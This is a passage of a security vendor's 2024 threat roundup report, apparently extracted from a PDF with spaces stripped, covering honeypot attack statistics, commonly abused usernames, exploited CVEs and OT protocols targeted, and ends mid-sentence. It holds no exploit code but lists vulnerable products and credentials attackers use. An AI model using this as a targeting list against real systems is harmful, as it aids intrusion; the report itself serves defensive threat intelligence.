2024年全球威胁综述报告 2024 Global Threat Roundup Report

Contents

1.ExecutiveSummary·3

2.MainFindings5

2.1.LocationRussiaRetakesChinasPosition··6

2.2.AutonomousSystemsNewTechniquesforRoutingAttacks··7

2.3.AttackedServicestheWebIstheUndisputedLeader··9

2.4.WeakCredentialsaReturntoGenericUsernames··10

2.5.ExploitsTheresStillMuchBeyondKEV··12

2.6.OTAttacksIncreasedFocusonBuildingAutomation··15

2.7.AttackerActions/TTPstheRiseofDiscovery··17

2.8.MalwareBotnetsAgainattheTop··1

9

2.9.ThreatActors–MoreConflictsBring

MoreThreatActorstotheScene··21

3.EvolutionofAttacksonCriticalInfrastructure··23

3.1.WhoIsBeingAttacked?··23

3.2.WhoIsAttacking?··26

4.Conclusion··

30

<)FORESCOU2024ThreatRoundup|2

<)FORESCOU2024ThreatRoundup|3

1.ExecutiveSummary

Fromthefinancialimpactofattackstogeopoliticaltensionsthatleadtocyberwarfare,cybersecurityistopof

mindforenterpriseandgovernmentorganizationsin2025.Inthisreport,welookbackatthe900millionattacksweanalyzedinthethreatlandscapeof2024.Additionally,weofferorganizationstacticalinsightsandstrategic

recommendationsforimprovingdefensesthisyear.

Cyberattacksareontheriseonceagain–includinganuptickoftargetsincriticalinfrastructureinthelastyear.Since2022,however,reportedincidentsincriticalinfrastructurerosefrom50to384globally–or668%,

accordingtodatafromtheEuropeanRepositoryofCyberIncidents,anindependentresearchconsortiumthatprovidesscientificanalysisofcyberincidents.

Takenote:WealsoincludeinformationonvulnerabilitiesandexploitsthatarenotontheCISA-KEVlistbutarebeingexploitedtoday.

KEYFINDINGS

ATTACKDATA

post-ExploitationActions

AttacksBYLocation

4%Execution

900millionattacksoriginatedfrom213countries:

12%

persistence

84%Discovery

upfrom25%in2023

Thetop10countriesaccountedfor

78%

ofthemalicious

traffic

Mostcommon originofAttackRussia>china

ExploitsoutsidecisAKEvcatalog

only

27%

ofexploitedvulnerabilitiesappearedinCSAKEV—

MostThreatActorroupschina2x>Russia

AttacksBYSource

downfrom35%in2023

57%33%1o%

25OTandIndustrialloT

fromhostingorcloud

providers

ofallattacks

originatedfrom

IPSmanaged

byISPS

fromorganizations

inbusiness,

governmentand

vulnerabilitiesarenot

listedontheCISAKEVlist

andareactivelyexploitEd

othersectors

protocolTargetspotlight:OT

5OTProtocolsTargeted

steadyincreaseinattackslaunchedbycompromised

devicesviaresidentialandotherproxies

ToP3AttackedserviceTypes

28%

Ethernet/IP

40%

Modbus

24%

step7,DNP3,

BAcnet(8%each)

webapplicationsviaexploitedvulnerabilitiesRemotemanagementprotocols

3BuildingAutomationprotocolsTargeted

Remotemanagementservicesincluding:ospecificusernameslinkedtodatabasesocloudandDevopsinfrastructure

BAcnetFoxKNX

ToPExploitTargetswebapplications

Networkinfrastructuredevices

AttacksoncriticalInfrastructure(cl)10%increaseyearoveryear

<)FORESCOU2024ThreatRoundup|4

<)FORESCOU2024ThreatRoundup|5

WhereDoesOurDataComeFrom?

MostdatausedforouranalysiscomesfromtheVedereLabsAdversaryEngagementEnvironment(AEE),asetofhoneypotsontheopeninternetluringattackersandrecordingtheirinteractions.Data

pointsintheAEEarecalledattacks.Theycanrepresentamultitudeofmaliciousactions,includingportscanningandbruteforcing.TheAEErecordedmorethan900millionattacksbetweenJanuaryand

December2024.Asubsetoftheseattackscontainsexploitsattemptstoexploitvulnerabilities.

OurdatadiffersfromwhatisseeninmanyotherthreatreportsbecauseitcomesfromspecializedIT/OT/IoThoneypotsthateithermimicrealisticdeviceprofiles–includingexposedprotocols,bannersandpartsofthefilesystem–orarerealspecializeddevices,insteadofgenerichoneypotscapturingeverykindofattack.

OurMalwareAnalysisLab(MAL)collectsandanalyzessamplesdroppedbyattackersontheAEEorsharedonpublicrepositories.Ourgoalisnottoanalyzeasmanysamplesaspossible,buttofocusonthosethatareunique.Weanalyzedmorethan100,000uniquemalwaresamplesbetweenJanuaryandDecember2024.

Also,weconstantlyhuntfornewcommandandcontrol(C2)infrastructureandmaintainathreatactorknowledgebasewithdataaboutmorethan800threatactors.

Attackers

MalwareAnalysisLab(MAL)

Security

Researcher

AdversaryEngagementEnvironment(AEE)

FORESCOUT

VEDERELABS

ThreatActor

2024ThreatRoundup

Knowledgebase

IntelFactory

Infrastructure

C2Hunting

<)FORESCOU2024ThreatRoundup|6

2.MainFindings

2.1.Location–RussiaRetakesChina’sPosition

TOPATTACKERIPLOCATIONS

d

b

S

R

V

Source:ForescoutResearchVedereLabsSource:ForescoutResearchVedereLabs

Figure1–DistributionofattacksbyIPaddresscountryoforigin

Figure1showsthedistributionofattacksdetectedbycountryoforigin.Wedetectedattacksoriginatingfrom213countriesandterritories(1morethanin2023and22morethanin2022).Countriesappearinthislistduetothepresenceoflegitimatehostingprovidersbeingabusedbyattackers;thepresenceofbulletproofhostingprovidersthatcaterspecificallytocybercriminalactivities;ortheuseofcompromisedhoststolaunchattacks.

Thisyear,thetop10countriesaccountedfor78%ofthemalicioustraffic.Thisisanegligibledifferenceof

1%morethanin2023butconsistentwiththegrowthobservedsince2022(73%).Thetop10listofcountries

originatingattackshasonlyoneentrydifferentfrom2023:PolandreplacedSingapore.However,therankshavechangedconsiderably.Themostnotablechange:Russiarosefrom9%to16%ofattacks.Chinadecreasedfrom18%to8%.

Itisimportanttostressthatitisnotdirectattributionforattacklocations.Itisonlywherewecanseeattackscomingfromastheyhitourhoneypots.OurthreatactordatabaseshowsthatmostactorsarestilllocatedinChina—althoughitdoesnotnecessarilymeanitisthesourceofindividualattacks.

Fact:ChinaandRussiahavebeeninthetop3ofIPaddressattackoriginsince2022.

InsightforDefenders:CountryoforiginalonecontinuestobeineffectivetojudgetheriskofaparticularIPaddress.However,ifyourorganizationdoesnotdobusinesswith–orin–countrieswiththehighestnumberofIPaddressesthatattack,blockingthoseIPrangesmayhelpreduceSOCnoise.

<)FORESCOU2024ThreatRoundup|7

2.2.AutonomousSystems-NewTechniquesforRoutingAttacks

Source:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Figure2–DistributionofattacksbyoriginatingAutonomousSystem

Attacksagainoriginatedfrommorethan500autonomoussystems(AS),whichareblocksofIPaddressesunderthecontrolofanorganization.Figure2showsthepercentageofattackscomingfromthethreetypesofASweobserve:

•InternetServiceProviders(ISPs)increasedfrom53%in2023to57%in2024

•Business,Government,andothersdecreasedfrom36%to33%.

•Hostingorcloudprovidersdecreasedfromto11%to10%.

Notethatthepercentagesshownabovedifferfromwhatwaspresentedinlastyear’sreportbecauseweremovedthe“unknown”categoryofASandonlyshowthenumbersofthosewecanclassify.

Aswediscussedlastyear,thelargechunkofattackscomingfromISPsaswellasbusiness,governmentandotherorganizationssignifiesanincreaseintheuseofcompromiseddevicestolaunchattacksasopposedtoleasinginfrastructurefromdedicatedproviders.

In2023,weattributedthistotheincreasedpopularityof“residentialproxy”services,wherethreatactorsproxytheirtrafficviaapplicationsrunningonresidentialdevices,whichtypicallyhaveIPaddressesmanagedbyISPs.Residentialproxiescontinuetobepopular,withemergingthreatactorsspecializingin

sellingaccesstohijacked

IoT

devicesforthisverypurpose,something

wepredictedinearly2023

.However,advancedpersistentthreat

actorshavenowgoneevenfurtheranddeveloped

OperationalRelayBoxes(ORB)networks

,wheretheymixvirtualprivateservers,compromisedIoTandhijackednetworkperimeterdevices,creatinglayersofproxyingtomakedetectionandattributionofattacksmorechallenging.

Onthecloudside,theuseofAmazonandGoogleinfrastructurecontinuedtobesignificant,withthosetwoaloneaccountingformorethan11%oftheattacksweobserved.AnotablechangewasthatthemajorChinesecloudproviderAlibabajumpedfrom22ndmostpopularASin2023tosixthin2024.

Overall,thetop10ASesareresponsiblefor48%ofattacks(4%lessthanin2023).SixASesfromthetop10in2023remaininthelistin2024:XhostInternetSolutionsLp,GOOGLE-CLOUD-PLATFORM,LIONLINK-NETWORKS,DIGITALOCEAN-ASN,ContaboGmbHandChangWayTechnologiesCo.Limited.

<)FORESCOU2024ThreatRoundup|8

Fact:AutonomousSystemscontinuetobeabettersignofriskthancountryoforigin.

InsightforDefenders:IPsbelongingtoknownriskyautonomoussystemsshouldalwaysbetreatedwithcare—especiallythosethatremaininthetop10foryears,suchas

DigitalOcean.Continuedattackerinterestincompromiseddevicestorouteactionshowsorganizationsneedreal-timethreatintelligenceaboutcompromiseddevicesinthewildandthetypesofdeviceattackersfocuson.ThisgoesbeyondAPTstargetingaspecificorganization.BewaryofopportunisticInitialAccessBrokers(IAB)thatbreachasmanyorganizationsaspossibleandsellthataccess.

<)FORESCOU2024ThreatRoundup|9

2.3.AttackedServices–theWebIstheUndisputedLeader

Source:ForescoutResearchVedereLabsSource:ForescoutResearchVedereLabs

Figure3–Distributionofattackedportsandservices

Figure3showstheshareoftraffictargetingeachtypeofnetworkservice,classifiedaccordingtoassignedor

well-knownIPv4TCPdestinationports:Webapplicationsincreasedfrom26%in2022and2023to41%in2024,continuingtobethemostattackedservicetypeandwideningwiththegapwiththeothertargets.Mostattacks

againsttheseservicesareeitherscanningorattemptsatvulnerabilityexploitation(seesection2.5).

Remotemanagementprotocols,suchasRDPandVNCforremotedesktop,andSSHandTelnetforremoteterminals,increasedfrom26%in2023to33%thisyear.Itwas43%in2022.Attacksontheseprotocolsaremainlybruteforcingorpasswordspraying(seesection2.4).

Remotestorageprotocols,suchasSMBandFTP,remainedrelativelystable,changingfrom20%to19%,

continuingtheirdecreasefrom23%in2022.Networkingprotocols,suchasDNS,DHCPandCWMP/TR-069,decreasedfrom10%to3%,returningtothebaselinein2022of1%.

Databaseservices,suchasMicrosoftSQLServer,Redis,mongoDB,MySQLandPostgreSQL,decreasedfrom6%to1%,returningto2022levels.

E-mailservices,suchasIMAP,POP3andSMTP,remainedunchangedsince2022atlessthan1%ofattacks.

Fact:Webapplicationsare,withoutadoubt,themostattackedservicetype,continuingthetrendfrom2023.

InsightforDefenders:Ensurethatdefenses,suchaswebapplicationfirewalls,arein

placetodetectandpreventattackssuchascommandinjections,cross-sitescriptingandSQLinjectionsasearlyaspossible.Theincreaseinattacksonremotemanagement

protocolsisalsosignificantbecausemostofthosearerelatedtocredential-basedattacks.Bestpracticesincredentialsareparamount,suchasavoidingdefaultandeasilyguessedpasswords.

<)FORESCOU2024ThreatRoundup|10

2.4.WeakCredentials-aReturntoGenericUsernames

Source:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Figure4–Topabusedcredentials

Figure4showsthemostabusedcredentialsweobserved,dividedintwocategories:

Genericusernamesinclude“root,”“admin,”“user,”“guest”andseveralothersuchcredentials.Theincreasefrom85%in2023to95%in2024showsthatattackersareagainrelyingmoreheavilyonbrute-forcingandsimple

dictionaryattacksthanontargetingspecificdevices.Thisisevenhigherthanthe87%weobservedin2022.Specificusernames(decreasedfrom15%to5%)canbeassociatedtospecificroles,suchas“www,”“backup,”“deployer”orevenspecificapplicationsanddevices,suchas“odoo,”“rpi,”“kafka,”“zabbix”or“ec2-user”

Eventhoughtheoverallpercentageofspecificusernamesdecreased,it’sstillrelevanttoanalyzethebreakdownoftypesofspecificusernamesthatattackersareabusing.In2023,themostpopularcategorywasIoTdevices(35%),whichisnowthefourthmostabusedtypeofusername.Database,DevOpsandCloudallbecamemuchmorerelevantthaninpreviousyears.Thedataisconsistentwithwhatwediscussedinsection2.3,sinceoftenthesetypesofservicesarewebapplications.

IntheIoTcategory,themostpopularusernameswere“ubnt”(forUbiquitirouters),“moxa”(forindustrial

networking)and“zyfwp”(forZyxelfirewalls).InFebruary2024,wepublishedan

analysisofbotnetstargeting

Ubiquitirouters

sincetherewasatakedownofMoobotwhichhadbeencommandeeredbyRussia’sAPT28.

<)FORESCOU2024ThreatRoundup|11

Fact:Bestpracticesforcredentialmanagementarecrucialtopreventattacksleveragingweakcredentials.

InsightforDefenders:NISTreleasedanupdatedversionofitsdigitalidentityguidelinesinAugust2024thatchallengessomelong-heldassumptionsinthecybersecurity

communityaboutpasswordcomplexityandtheneedforperiodicchanges.

<)FORESCOU2024ThreatRoundup|12

2.5.ExpIoits-There’sStiIIMuchBeyondKEV

Source:ForescoutResearchVedereLabsSource:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Figure5–Vulnerabilitiesexploitedduringthestudyperiod

Exploitattemptsagainstwebserversandapplicationshavebeenonasteadyrisesince2022,andcontinueasthelargestcategorywesee:

•2022:14%

•2023:36%

•2024:56%

Thisisinlinewithwhatweobservedfortargetedservicesinsection2.3.

Exploitsagainstnetworkinfrastructuredevices,suchasfirewalls,routers,andVPNappliancesincreasedfrom3%in2022to11%in2023andnow14%,becomingthesecondmostpopularcategory.Wediscussedthis

ongoingtrendinour

2024H1threatreview

.Softwarelibrariescontinuetodecreaseasapercentageoftargetsforexploitation:

•2022:76%

•2023:29%

•2024:14%

SeveralcategoriesofIoTdevicesandotherapplicationsknowntobeoftenexposedandvulnerablearealsoroutinelytargeted,butthiscategorydecreasedfrom24%to16%.

<)FORESCOU2024ThreatRoundup|13

Threeotherobservationsarerelevant:Fiveofthetop10mostexploitedvulnerabilitieswereportedin2023remainedinthelistin2024:

CVE-2021-36260affectingHikvision

CVE-2022-0543affectingRedis

CVE-2021-38647affectingMicrosoftWindows

CVE-2020-0796affectingMicrosoftWindows

CVE-2021-22205affectingGitLab

Twonewentriesareespeciallyrelevant:CVE-2023-4966andCVE-2024-1709.CVE-2023-4966whichaffectsCitrixNetScalerappearedasa

0-dayin2023

butcontinuedtobeheavilyexploitedin2024.CVE-2024-1709,affectingConnectWiseScreenConnect,isnotoriouslyeasytoexploitandwasusedin

ransomwarecampaigns

.Onlyoneofthesehasbeenonthelistsince2022:CVE-2022-0543whichaffectsRedisonDebiansystems.

ThepercentageofexploitedvulnerabilitiesnotinCISAsKnownExploitedVulnerabilities(KEV)increasedfrom65%to73%.We

publishedastudyinMay

detailingthisphenomenonandpredictingthatitwouldcontinuetoincreaseasattackersexploremoreoforganizationsattacksurfacebeyondtraditionalendpoints.

WhenwemergeourAEEdatawithobservationsfromthe

Shadowserverfoundation

,wecomeupwithalistofatleast25vulnerabilitiesaffectingOTandIndustrialIoTdevicesthatareexploitedbybotnetsorautomatedattacksandwhicharenotincludedinCISAsKEV(shownbelow).

<)FORESCOU2024ThreatRoundup|14

VendorProductsCVEs

ApsystemsAltenergyPowerControlSoftwareCVE-2023-28343

Carel

pCOWeb

CVE-2019-11370

CHIYUTechnology

CHIYUBF-430,BF-431andBF-450M

CVE-2021-31250

CONTEC

SolarViewCompact

CVE-2023-23333

CVE-2022-29303

CVE-2022-40881

CVE-2023-29919

Eaton

IntelligentPowerManager

CVE-2018-12031

ECOA

BuildingAutomationSystem

CVE-2021-41293

Emerson

DixellXWEB-500

CVE-2021-45420

Endress+Hauser

WirelessHARTFieldgateSWG70

CVE-2018-16059

frangoteam

FUXA

CVE-2023-33831

Honeywell

HoneywellPM43

CVE-2023-3710

KevinLAB

BuildingEnergyManagementSystem

CVE-2021-37291

Linear

eMerge

CVE-2019-7254

CVE-2019-7256

CVE-2022-46381

Loytec

LGATE-902

CVE-2018-14918

OpenAutomationSoftware

OASPlatform

CVE-2022-26833

SchneiderElectric

EVlinkCity,ParkingandSmartWallbox

CVE-2021-22707

SchneiderElectric

SpaceLogicC-BusHomeController

CVE-2022-34753

Teltonika

TeltonikaRUT9XXseries

CVE-2018-17532

Viessman

Vitogate300BN/MB

CVE-2023-45852

WAGO

WAGOproducts(multiple)

CVE-2023-1698

ZKTeco

ZKTecoZEM500-510-560-760,ZEM600-800,ZEM720,ZMM

CVE-2022-42953

Guidance:Paymoreattentiontoattackergoalsandindustrytargetsovercountryoforiginalone.

Insightfordefenders:Blockingcommunicationssimplybycountryoforiginisnot

effective.Similarly,knowingwherethreatactorscomefromisnotnecessarilythemostusefulinformation.However,knowingwhattheirgoalsareandwhatindustriestheyareattackingcanhelptoprioritizestrategicsecurityinvestments.Organizationsinthemostaffectedindustries,especially,shouldpayattentiontothelatestthreatintelligenceto

monitorcampaignsthattargetspecificsectors.

<)FORESCOU2024ThreatRoundup|15

2.6.OTAttacks–IncreasedFocusonBuildingAutomation

Source:ForescoutResearchVedereLabsSource:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Figure6–AttacksagainstOTprotocols

Figure6showsthedistributionofattackstargetingOTprotocols.Asin2023,wehighlightfiveprotocolsasthetopexploited:

1.Modbus,themostpopularand

mostoftenexposed

,OTprotocolincreasedfrom33%to40%

2.EtherNet/IPincreasedfrom19%to28%

3.Step7,usedbySiemensdevices,decreasedfrom18%to8%

4.DNP3,oftenusedinutilities,decreasedfrom18%to8%

5.BACnet,usedforbuildingautomation,isthefifthmostattackedprotocolwith7%oftotalattacks

Thelistofotherprotocolsremainedsimilartolastyear—withtwonotablechanges.‘Others’increasedfrom2%to9%andanewbuildingautomationprotocol(KNX/IP)appearedonthelistasthethirdmostrelevant.Overall,thedatapaintsapictureofaheavyinterestinModbusandmorefragmentedinterestinadiversityofother

protocols.Itmeansitisnotenoughtofocusonthepopularprotocolsforwhichthemostcommonattacktoolsareavailable.

Lookingatcategories,weseethatattacksonindustrialautomationprotocolsincreasedfrom71%to79%,utilitiesdecreasedsignificantlyfrom28%to12%andbuildingautomationincreasedfrom1%to9%.Themostrelevant

increaseisinthebuildingautomationcategoryespeciallywhenwelookatthenewprotocolsbeingattacked.Lastyear,wediscussedhowattacksonbuildingautomationfocusedonexploitingvulnerabilitiesratherthan

interactingdirectlywithprotocols.Thisyear,weseethattheinterestinbuildingautomationprotocolsisincreasingasattackersarestillexploitingvulnerabilitiesonthosedevices(asevidencedbythetableinsection2.5).

<)FORESCOU2024ThreatRoundup|16

Fact:MonitoringthetraffictoandfromOTdevicesisnowascriticalasmonitoringITtraffic.

Insightfordefenders:AttackersareconstantlyprobingOT/ICSassetsforweaknesses.ManyorganizationswillbeblindtothembecausetheydonothavevisibilityintotheirOT/IoTinfrastructure.Thetruthisthatbuildingautomation,andprotocolssuchasModbus,arenowfoundinalmosteveryorganizationandareatargetforattackers.

<)FORESCOU2024ThreatRoundup|17

2.7.AttackerActions/TTPs–theRiseofDiscovery

Source:ForescoutResearchVedereLabs

Figure7–Topexecutedcommands

Figure7showsthedistributionoftop10commandsexecutedafterattackersmanagedtogetinitialaccess—mainlyoverSSHorTelnet.MostoftheattacksweobservedwereautomatedandusedthefollowingATT&CKtactics:

TA0007–Discovery

representsaround84%ofpost-exploitationactivities,upfrom25%in2023.

TheseactivitiesincludeobtaininginformationsuchasCPU,RAM,filesystem,operatingsystemandarchitecture,aswellaslistinglogged-inusers,runningprocessesandscheduledjobs.Discoveryaccountedfor95%ofactionsin2022.

TA0003–Persistence

representsaround12%ofobservedcommands,downfrom50%observedin2023butstillupfromtheoriginal3%in2022.

Persistencecomprisesfourmainprocedures:persistingSSHkeys,downloadingbackdooredshells,creatingormanipulatinguseraccountsandexecutingbackgroundprocesses.

TA0002–Execution

representsaround4%ofobservedcommands,downfrom25%in2023butalsostillupfromthe1%of2022.

Thesecommandsarerelatedtointeractingwiththefilesystem,downloadingandexecutingfurthermalware.

<)FORESCOU2024ThreatRoundup|18

Fact:Anincreaseindiscoveryactionsmeansattackersarespendingmoretime

interactingwithabreachedsystembeforemovingontoothertargetstoeitherunderstandthesystemortofindotherpotentialvictims.

InsightforDefenders:Moretimespentondiscoverycreatesnewopportunitiesfor

detectionbeforemoredamagingactionsaretakenonadevice,suchasdataexfiltration,deletionorencryption.Itiscrucialtobeabletodetectsignsofthesediscoveryactionsassoonaspossible,eitherviaendpointtelemetryaboutsystemdiscoveryorvianetworksignalsgeneratedbynetworkdiscoveryactions.

<)FORESCOU2024ThreatRoundup|19

2.8.Malware-BotnetsAgainattheTop

Source:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Source:ForescoutResearchVedereLabs

Figure8–DistributionofobservedmalwaresamplesandC2servers

Figure8showsthedistributionofmalwareandobservedcommandandcontrol(C2)serversinourdataset.In

2023,wesawatiebetweenremoteaccessTrojans(RATs)andinformationstealers(infostealers)withbotnets

cominginthirdplace.Thisyear,weseebotnetsatthetop,followedbyinfostealersandRATs.The‘Others’

categoryincludeskeyloggers,cryptominers,ransomware,wormsandothermalicioussoftware.Overall,thisdatadoesnotshowanybigchangesinthelandscapeofmalwaretypes.

ThisisdifferentforindividualmalwarefamiliesandC2s:

•5ofthemostpopularmalwarefamiliesof2024werenotinthe2023list:Lumma,Gafgyt,Healer,CredentialFlusher,andRemcos.Miraireturnedtothetopasthemostpopularmalwareweobserve,butLumma(in

secondplace)isthemostpopularnewentry.

•4ofthemostpopularC2of2024werenotinthe2023list:Viper,DarkGate,Quasar,DcRAT.AlthoughCobaltStrikeremainsbyfarthemostpopularC2,theuseofViperhassurged,surpassingevenSliver,whichwas

gainingalotofattentionin2023.

<)FORESCOU2024ThreatRoundup|20

Fact:Althoughindividualmalwaresamplesandfamiliesevolveeveryday,the